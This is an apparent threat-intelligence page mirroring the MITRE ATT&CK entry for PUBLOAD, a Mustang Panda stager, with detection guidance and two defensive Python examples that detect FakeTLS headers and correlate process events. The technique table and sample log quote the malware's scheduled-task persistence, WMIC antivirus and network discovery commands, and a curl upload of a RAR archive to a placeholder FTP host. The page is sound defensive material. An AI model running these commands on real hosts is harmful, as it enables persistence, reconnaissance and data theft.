S1228: PUBLOAD
PUBLOAD is a stager malware that has been observed installing itself in existing directories such as `C:\Users\Public` or creating new directories to stage the malware and its components.[1] PUBLOAD malware collects details of the victim host, establishes persistence, encrypts victim details using RC4 and communicates victim details back to C2. PUBLOAD malware has previously been leveraged by China-affiliated actors identified as Mustang Panda. PUBLOAD is also known as “NoFive” and some public reporting identifies the loader component as CLAIMLOADER.[2]
Analyst context for executives and security teams
PUBLOAD matters because it represents a Windows stager pattern: establish a foothold, place components in believable local directories such as C:\Users\Public or newly created staging paths, collect host details, persist, and communicate back to command and control. For leaders, the decision value is not just “malware exists,” but whether the organization can quickly prove what ran, where it staged files, what persistence was created, what host details left the environment, and whether follow-on tool transfer occurred.
Executive priority
Prioritize PUBLOAD as a readiness test for Windows endpoint visibility, egress monitoring, and incident response scoping. The ATT&CK relationships connect it to discovery, scheduled task persistence, command shell/WMI execution, obfuscation/compression, web/file-transfer based C2, and ingress tool transfer. That combination can affect business continuity by turning an initial host compromise into a harder-to-scope intrusion. Executives should ask whether SOC and IR teams can produce audit-ready evidence for endpoint process activity, task creation, suspicious staging directories, registry/service discovery, and outbound network sessions from affected hosts.
Technical view
PUBLOAD is a Windows malware object with no official ATT&CK detection text provided. Defensive validation should therefore be behavior-led using its mapped relationships: monitor creation and execution of files from public or newly created staging directories; correlate command shell, WMI, scheduled task, registry query, service/process/network discovery, and system information collection activity; and review outbound web or file-transfer protocol traffic that may impersonate legitimate services. Because the object is described as encrypting victim details with RC4 and communicating them to C2, network and host triage should focus on unusual outbound sessions following host discovery and persistence events rather than relying only on static signatures.
Likely telemetry
- Windows endpoint process creation and command-line logs
- File creation, modification, and execution events in C:\Users\Public and other newly created directories
- Scheduled task creation and modification telemetry
- WMI activity and command execution records
- Windows Registry query activity
Detection direction
- Validate correlations across staging location, execution, discovery, persistence, and outbound communication; single events such as C:\Users\Public file creation may be noisy without sequence context.
- Tune for suspicious use of cmd.exe, WMI, schtasks, registry queries, service enumeration, and process/network discovery when performed by unusual parent processes or from uncommon directories.
- Review outbound web and file-transfer protocol traffic from newly infected or rarely communicating endpoints, especially after local discovery activity.
- Account for false positives from legitimate administration, software deployment, inventory tools, and help desk scripts; baselining approved management activity is important.
- Because no official detection guidance is supplied, do not assume existing ATT&CK coverage maps detect PUBLOAD specifically; test detections against the mapped behaviors instead.
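For the outbound-traffic item above, here is an added example of the kind of network check a defender can run; it is not code from the page, the ATT&CK object, or any PUBLOAD report. The only facts taken from this page are that PUBLOAD prefixes traffic with the bytes 17 03 03 to look like a TLS application-data record and has used the magic value 46 77 4d. A genuine TLS session begins with a handshake record (content type 0x16 carrying a ClientHello), so a client stream whose very first record is application data (0x17) never negotiated TLS at all. The packet payloads are constructed, the function assumes you already have the client-to-server half of a reassembled TCP stream (for example from a packet capture), and the placement of the 46 77 4d magic at the start of a record body is an assumption, since the page does not say where it sits.

```python
"""FakeTLS heuristic: TLS-looking records with no handshake.

Added example, not part of the ATT&CK object or the mirror page. Inputs are
constructed byte strings standing in for the client half of a TCP session.
"""
import struct

TLS_HANDSHAKE = 0x16          # genuine sessions start with this content type
TLS_APPLICATION_DATA = 0x17   # the 17 in the 17 03 03 header the page describes
KNOWN_VERSIONS = {0x0301, 0x0302, 0x0303, 0x0304}   # TLS 1.0 .. 1.3 record versions
FWM_MAGIC = bytes.fromhex("46774d")  # magic bytes 46 77 4d from the table


def parse_records(stream: bytes):
    """Split a stream into (content_type, version, body) TLS-style records.

    Parsing stops at the first header that does not look like TLS or whose
    declared length runs past the available bytes, so plain HTTP yields [].
    """
    records, off = [], 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack("!BHH", stream[off:off + 5])
        if version not in KNOWN_VERSIONS or off + 5 + length > len(stream):
            break
        records.append((ctype, version, stream[off + 5:off + 5 + length]))
        off += 5 + length
    return records


def assess_client_stream(stream: bytes) -> dict:
    """Heuristic verdict for one client->server stream."""
    records = parse_records(stream)
    findings = []
    if not records:
        return {"records": 0, "findings": findings, "suspicious": False}
    first_type, _, first_body = records[0]
    if first_type == TLS_APPLICATION_DATA:
        # Application data before any handshake: the header is decoration only.
        findings.append("app-data-before-handshake")
    elif first_type == TLS_HANDSHAKE and first_body[:1] != b"\x01":
        # Handshake record that is not a ClientHello (type 1) is also odd for a client.
        findings.append("handshake-not-clienthello")
    # Assumption: the magic value, if present, leads a record body.
    if any(c == TLS_APPLICATION_DATA and b.startswith(FWM_MAGIC) for c, _, b in records):
        findings.append("magic-46774d")
    return {"records": len(records), "findings": findings, "suspicious": bool(findings)}


def build_genuine_tls_client() -> bytes:
    """Constructed: a ClientHello record followed by one application-data record."""
    hello = b"\x01" + bytes(40)            # handshake type 1 = ClientHello, body padded
    data = bytes(32)
    return (b"\x16\x03\x01" + struct.pack("!H", len(hello)) + hello
            + b"\x17\x03\x03" + struct.pack("!H", len(data)) + data)


def build_faketls_client() -> bytes:
    """Constructed: 17 03 03 header over an opaque body that starts with the magic."""
    body = FWM_MAGIC + bytes(range(29))
    return b"\x17\x03\x03" + struct.pack("!H", len(body)) + body


PLAIN_HTTP = b"POST /index.php HTTP/1.1\r\nHost: example.invalid\r\n\r\n"  # constructed

if __name__ == "__main__":
    for name, stream in [("genuine", build_genuine_tls_client()),
                         ("faketls", build_faketls_client()),
                         ("http", PLAIN_HTTP)]:
        print(name, assess_client_stream(stream))
```

The check is cheap enough to run over every outbound session to an uncommon destination; pair it with the host-side sequence (discovery, then persistence, then the first outbound session) rather than alerting on the header alone, because a bare 17 03 03 prefix also appears in mid-stream captures of legitimate TLS when the handshake was missed.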
Mitigation priorities
- Harden Windows endpoint execution controls around user-writable and public directories where feasible.
- Restrict and monitor scheduled task creation, WMI usage, command shell execution, and registry/service discovery by non-administrative or unexpected processes.
- Ensure endpoint detection, centralized logging, and network egress telemetry are retained long enough to reconstruct staging, persistence, discovery, and C2 timelines.
- Apply least privilege and administrative tool governance to reduce abuse of legitimate Windows management features.
- Use egress filtering and proxy/firewall review to limit unnecessary outbound web and file-transfer protocol paths from workstations and servers.
Analyst notes and limits
ATT&CK identifies PUBLOAD as a stager observed installing in existing directories such as C:\Users\Public or creating new directories to stage malware and components. It is described as collecting victim host details, establishing persistence, encrypting victim details using RC4, and communicating those details back to C2. ATT&CK also notes prior use by the China-affiliated group Mustang Panda and reporting overlap where PUBLOAD is known as NoFive and the loader component may be identified as CLAIMLOADER in public reporting.
The supplied ATT&CK object has no official detection section and no malware-level tactics listed. The guidance above is derived from the official description, Windows platform field, external references, and supplied relationships to techniques. Local validation is required to determine whether telemetry exists, whether detections are enabled, and whether observed activity is malicious or legitimate administration.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1105 | Ingress Tool Transfer | PUBLOAD has acted as a stager that can download the next-stage payload from its C2 server. [Lab52 MUSTANG PANDA PUBLOAD MAY 2023; IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload; Palo Alto Networks, Unit 42] PUBLOAD has also delivered FDMTP as a secondary control tool and PTSOCKET for exfiltration to some infected systems. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1518.001 | Security Software Discovery (sub-technique) | PUBLOAD has identified AV products on an infected host using the following command: `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1553.002 | Code Signing (sub-technique) | PUBLOAD has used valid legitimate digital signatures and certificates to evade detection. [CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024] |
| Enterprise | T1033 | System Owner/User Discovery | PUBLOAD has obtained the username from an infected host. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1614.001 | System Language Discovery (sub-technique) | PUBLOAD has checked supported languages on the compromised system. [CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024] |
| Enterprise | T1001.003 | Protocol or Service Impersonation (sub-technique) | PUBLOAD has modified HTTP POST requests to resemble legitimate communications. [Lab52 MUSTANG PANDA PUBLOAD MAY 2023; Palo Alto Networks, Unit 42] PUBLOAD used FakeTLS headers in network packets to impersonate various versions of TLS protocols to blend in with legitimate network traffic. PUBLOAD has utilized FakeTLS headers with the bytes `17 03 03`. [2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA] |
| Enterprise | T1053.005 | Scheduled Task (sub-technique) | PUBLOAD has created scheduled tasks to maintain persistence with the command `schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR C:\\Users\\Public\\Libraries\...`. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; Lab52 MUSTANG PANDA PUBLOAD MAY 2023; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1622 | Debugger Evasion | PUBLOAD has embedded debug strings with messages to distract analysts. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] PUBLOAD has leveraged the `OutputDebugStringW` and `OutputDebugStringA` functions. [2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1027.015 | Compression (sub-technique) | PUBLOAD has been delivered as compressed files within ZIP files to victims. [Lab52 MUSTANG PANDA PUBLOAD MAY 2023; Palo Alto Networks, Unit 42] |
| Enterprise | T1057 | Process Discovery | PUBLOAD has used `tasklist` to gather running processes on the victim host. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] PUBLOAD has also leveraged the `OpenEventA` Windows API function to check whether the same process was already running. [2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | PUBLOAD has decoded its payload prior to execution. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; Lab52 MUSTANG PANDA PUBLOAD MAY 2023; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload; Palo Alto Networks, Unit 42] |
| Enterprise | T1071.002 | File Transfer Protocols (sub-technique) | PUBLOAD has used `curl` for data exfiltration over FTP. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1016.002 | Wi-Fi Discovery (sub-technique) | PUBLOAD has collected information on Wi-Fi networks from victim hosts leveraging `netsh wlan show profiles`, `netsh wlan show interface`, and `netsh wlan show`. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1573.001 | Symmetric Cryptography (sub-technique) | PUBLOAD has used RC4 encryption in C2 communications. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1574.001 | DLL (sub-technique) | PUBLOAD has abused legitimate executables to side-load malicious DLLs. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024; Lab52 MUSTANG PANDA PUBLOAD MAY 2023; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload; Palo Alto Networks, Unit 42; PaloAlto MUSTANG PANDA PUBLOAD MARCH 2024] |
| Enterprise | T1016 | System Network Configuration Discovery | PUBLOAD has obtained information about local networks through the `ipconfig /all` command. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1480.001 | Environmental Keying (sub-technique) | PUBLOAD has utilized environmental keying in the payload to include the victim volume serial number, computer name, username, and machine’s tick count. [2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA] |
| Enterprise | T1059.003 | Windows Command Shell (sub-technique) | PUBLOAD has used several commands executed in sequence via `cmd`. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1027 | Obfuscated Files or Information | PUBLOAD has obfuscated DLL names using the ror13AddHash32 algorithm. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder (sub-technique) | PUBLOAD has added Registry Run keys to achieve persistence using `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024; Lab52 MUSTANG PANDA PUBLOAD MAY 2023; Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1106 | Native API | PUBLOAD has used various Windows API calls during execution, when establishing persistence and defense evasion. [Lab52 MUSTANG PANDA PUBLOAD MAY 2023; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA] The PUBLOAD stager leveraged Windows API functions with callbacks, including `GrayStringW`, `EnumDateFormatsA`, and `LineDDA`, to bypass anti-virus monitoring. [2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] PUBLOAD has also utilized other native Windows API functions with callback functions such as `EnumChildWindows` and `EnumSystemLanguageGroupsA`. [Palo Alto Networks, Unit 42] |
| Enterprise | T1560.001 | Archive via Utility (sub-technique) | PUBLOAD has used utilities such as `WinRAR` to archive data prior to exfiltration. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1680 | Local Storage Discovery | PUBLOAD has leveraged `wmic logicaldisk get` to map local network drives. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1518 | Software Discovery | PUBLOAD has used several commands executed in sequence via `cmd` in a short interval to gather software versions, including querying Registry keys. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1012 | Query Registry | PUBLOAD has queried Registry values to identify software using `reg query`. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1205 | Traffic Signaling | PUBLOAD has utilized a magic value in C2 communications and only executes in memory when response packets match the specific values `17 03 03`. [CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024; IBM MUSTANG PANDA PUBLOAD CLAIMLOADER JUNE 2025; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA; 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload; PaloAlto MUSTANG PANDA PUBLOAD MARCH 2024] PUBLOAD has also used magic bytes consisting of `46 77 4d`. [CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024] |
| Enterprise | T1016.001 | Internet Connection Discovery (sub-technique) | PUBLOAD has identified internet connectivity details through commands such as `tracert -h 5 -4 google.com` and `curl http://myip.ipip.net`. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | PUBLOAD has communicated via `curl` over HTTP to identify device IP data. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] PUBLOAD has also utilized HTTP as a command-and-control protocol through HTTP POST. [CSIRT CTI MUSTANG PANDA PUBLOAD TONESHELL JAN 2024; Lab52 MUSTANG PANDA PUBLOAD MAY 2023; Palo Alto Networks, Unit 42] PUBLOAD has also leveraged HTTPS for C2. [2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA] |
| Enterprise | T1007 | System Service Discovery | PUBLOAD has leveraged `tasklist` to gather running services on the victim host. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1124 | System Time Discovery | PUBLOAD has collected the machine’s tick count through the use of `GetTickCount`. [2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA] |
| Enterprise | T1049 | System Network Connections Discovery | PUBLOAD has used several commands executed in sequence via `cmd` in a short interval to gather information on network connections. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1047 | Windows Management Instrumentation | PUBLOAD has used `wmic` to gather information from the victim device. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol (sub-technique) | PUBLOAD has leveraged `curl` for data exfiltration over FTP by uploading RAR archives containing targeted files (.doc, .docx, .xls, .xlsx, .pdf, .ppt, .pptx) to an adversary-owned FTP site. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location (sub-technique) | PUBLOAD has renamed malicious files to mimic legitimate file names such as `adobe_wf.exe`. [2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
| Enterprise | T1082 | System Information Discovery | PUBLOAD has collected and sent system information, including volume serial number, computer name, and system uptime, to the designated C2. [Cisco Talos MUSTANG PANDA PLUGX PUBLOAD MAY 2022; 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA] PUBLOAD has also used several commands executed in sequence via `cmd` in a short interval to gather system information about the infected host, including `systeminfo`. [Trend Micro MUSTANG PANDA PUBLOAD HIUPAN SEPTEMBER 2024] PUBLOAD has decrypted shellcode that collects the computer name. [2022 November_TrendMicro_Earth Preta_Toneshell_Pubload] |
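The Detection direction list asks for correlation across staging location, execution, discovery, persistence and outbound communication rather than alerting on a single `C:\Users\Public` event; the technique table above supplies the concrete command shapes. The following is a worked example added here (not code from the page, the ATT&CK object, or any vendor report) that classifies process-creation command lines into the table's technique IDs and then raises an alert only when an executable run from a public staging directory is followed, within a short window, by a scheduled-task creation and at least two discovery commands. The pipe-delimited event format, hostnames, timestamps, parent images, the `stager_placeholder.exe` and `EXAMPLE-FTP-HOST` names, and every log line are constructed; the `Microsoft_Licensing` task name and the WMIC, `netsh`, `ipconfig`, `tasklist` and `curl` shapes come from the table.

```python
"""Correlate PUBLOAD-style host behaviours across Windows process-creation events.

Added example, not part of the ATT&CK object or the mirror page. The event
format, hostnames, timestamps, images and every sample line are constructed;
map the field names onto your own EDR or Sysmon schema.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line shapes from the procedure column of the technique table,
# keyed by the ATT&CK technique ID the table maps them to.
TECHNIQUE_PATTERNS = {
    "T1518.001": re.compile(r"wmic\b.*securitycenter2.*antivirusproduct", re.I),
    "T1047": re.compile(r'^\s*"?wmic(\.exe)?"?(\s|$)', re.I),
    "T1680": re.compile(r"wmic\b.*logicaldisk\s+get", re.I),
    "T1053.005": re.compile(r"schtasks(\.exe)?\b.*/create\b", re.I),
    "T1057": re.compile(r'^\s*"?tasklist(\.exe)?"?(\s|$)', re.I),
    "T1016.002": re.compile(r"netsh\b.*wlan\s+show", re.I),
    "T1016": re.compile(r"ipconfig(\.exe)?\s+/all", re.I),
    "T1016.001": re.compile(r"tracert\b|curl\b.*myip\.ipip\.net", re.I),
    "T1012": re.compile(r"\breg(\.exe)?\s+query\b", re.I),
    "T1082": re.compile(r'^\s*"?systeminfo(\.exe)?"?(\s|$)', re.I),
    "T1071.002": re.compile(r"curl\b.*\bftp://", re.I),
}
DISCOVERY = {"T1518.001", "T1047", "T1680", "T1057", "T1016.002",
             "T1016", "T1016.001", "T1012", "T1082"}
PERSISTENCE = {"T1053.005"}
EGRESS = {"T1071.002", "T1016.001"}
STAGING_DIR = re.compile(r"c:\\users\\public\\", re.I)   # staging path named on the page
WINDOW = timedelta(minutes=10)                            # assumed correlation window

# Constructed sample: timestamp|host|parent image|image|command line.
# WS-0412 shows the full chain; WS-0077 is a help-desk inventory script;
# WS-0190 is a lone executable run from C:\Users\Public with nothing after it.
SAMPLE_EVENTS = r"""
2025-09-01T09:00:01|WS-0412|C:\Windows\explorer.exe|C:\Users\Public\Libraries\stager_placeholder.exe|"C:\Users\Public\Libraries\stager_placeholder.exe"
2025-09-01T09:00:03|WS-0412|C:\Users\Public\Libraries\stager_placeholder.exe|C:\Windows\System32\schtasks.exe|schtasks.exe /F /Create /TN Microsoft_Licensing /sc minute /MO 1 /TR C:\Users\Public\Libraries\stager_placeholder.exe
2025-09-01T09:00:09|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
2025-09-01T09:00:10|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\tasklist.exe|tasklist
2025-09-01T09:00:11|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
2025-09-01T09:00:12|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\netsh.exe|netsh wlan show profiles
2025-09-01T09:00:40|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|curl -T C:\Users\Public\Libraries\out.rar ftp://EXAMPLE-FTP-HOST/upload/
2025-09-01T10:15:00|WS-0077|C:\Program Files\HelpDeskAgent\agent.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
2025-09-01T10:15:01|WS-0077|C:\Program Files\HelpDeskAgent\agent.exe|C:\Windows\System32\systeminfo.exe|systeminfo
2025-09-01T11:30:00|WS-0190|C:\Windows\explorer.exe|C:\Users\Public\setup_tool.exe|"C:\Users\Public\setup_tool.exe" /quiet
"""


def classify(cmdline: str) -> set:
    """Return every technique ID whose pattern matches the command line."""
    return {tid for tid, pat in TECHNIQUE_PATTERNS.items() if pat.search(cmdline)}


def parse_events(text: str) -> list:
    """Parse the pipe-delimited sample format into event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host, "parent": parent,
                       "image": image, "cmdline": cmdline, "techniques": classify(cmdline)})
    return events


def correlate(events: list, window: timedelta = WINDOW) -> dict:
    """Alert per host when a staging-directory execution is followed within
    `window` by scheduled-task persistence and at least two discovery techniques."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    alerts = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, anchor in enumerate(evs):
            if not STAGING_DIR.search(anchor["image"]):
                continue
            seen = set()
            for ev in evs[i:]:
                if ev["ts"] - anchor["ts"] > window:
                    break
                seen |= ev["techniques"]
            pers, disc = seen & PERSISTENCE, seen & DISCOVERY
            if pers and len(disc) >= 2:
                alerts[host] = {"staged": anchor["image"], "persistence": sorted(pers),
                                "discovery": sorted(disc), "egress": sorted(seen & EGRESS)}
                break
    return alerts


if __name__ == "__main__":
    for host, alert in correlate(parse_events(SAMPLE_EVENTS)).items():
        print(host, alert)
```

Only WS-0412 is raised: WS-0077 runs the same discovery commands but from an approved agent with no staging-directory execution and no persistence, and WS-0190 is the noisy single event the Detection direction list warns about. The thresholds (ten minutes, two discovery techniques) are starting points to tune against your own baseline of administrative activity.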
Groups, software, and campaigns
G0129: Mustang Panda
Mustang Panda is a China-based cyber espionage threat actor that has been conducting operations since at least 2012. Mustang Panda has been known to use tailored phishing lures and decoy documents to deliver malicious payloads. Mustang Panda has targeted government, diplomatic, and non-governmental organizations, including think tanks, religious institutions, and research entities, across the United States, Europe, and Asia, with notable activity in Russia, Mongolia, Myanmar, Pakistan, and Vietnam. [1][2][3][4][5][6][7][8][9][10][11][12][13]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 6d7e178c3ac5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] 2022 November_TrendMicro_Earth Preta_Toneshell_Pubload: Nick Dai, Vickie Su, Sunny Lu. (2022, November 18). Earth Preta Spear-Phishing Governments Worldwide. Retrieved August 4, 2025.
[2] 2025_IBM_PUBLOAD_TONESHELL_HIUPAN_CLAIMLOADER_MUSTANG PANDA: Golo Muhr, Joshua Chung. (2025, May 15). Hive0154 targeting US, Philippines, Pakistan and Taiwan in suspected espionage campaign. Retrieved August 4, 2025.
[3] mitre-attack S1228
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.